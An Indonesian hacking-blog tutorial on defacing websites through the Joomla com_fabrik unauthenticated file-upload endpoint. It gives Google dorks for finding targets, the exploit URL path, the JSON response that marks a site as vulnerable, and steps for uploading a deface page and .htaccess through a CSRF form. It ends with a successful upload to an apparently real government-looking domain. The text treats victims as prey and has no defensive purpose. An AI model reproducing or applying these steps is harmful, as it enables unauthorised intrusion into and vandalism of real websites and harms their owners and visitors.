Deface Metode Com_Fabrik CSRF

   Lama Ga update cuy..
soory karena keterbatasan kuota hohoho :v

oke kali ini gua bakalan share cara deface metode Com_Fabrik CSRF
simak tutorialnya ea

Siapin dlu Dorknya
-Dork : inurl:index.php?option=com_fabrik
             inurl:index.php/component/fabrik/ site:.dk
             inurl:index.php?option=com_fabrik&view= site:
             inurl:importcsv.php site:
             inurl:viewTable?cid= site:com
kenbangin pake otak mesum lu ea..jngan cma khayalan yang dikembangin 😀 Kidding

 Exploitnya : /index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload

Truss htaccess nya DirumahGue
Csrf nya DirumahLu

Oke langsung aja simak baik2..
Pertama dorking dlu di google
 

Truss masukin tuh exploitnya d blakang link,,
contoh:  site.co.li/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload

nah klo udah ditambahin nanti akan muncul kaya gini

nah kalo tulisanya kaya gini {"filepath":null,"uri":null} brarti tuh website vuln ea ..
langsung jadiin mangsa :v
setelah itu masukin tuh site.co.li nya ke CSRF

Itu yang Site.co,li nya diganti nama site target luh ea
nah setelah jadi langsung deh luh masukin scrip deface luh sama htaccess nya

jangan lupa ganti htaccess nya jadi nama sc lu ea kaya gini

nah setelah itu upload sc deface kalian dah akan kaya gini hasilnya
muncul tulisan {"filepath":"\/ilusi.html","uri":"http:\/\/www.pn-parepare.go.id.org\/ilusi.html"}
brarti sukses uploadnya

oke dan buka site kalian dan taraa terdeface ,,hohohoho :v

semoga berhasil ya jika ada pertanyaan silakan tulis di komentar
trima kasih bye...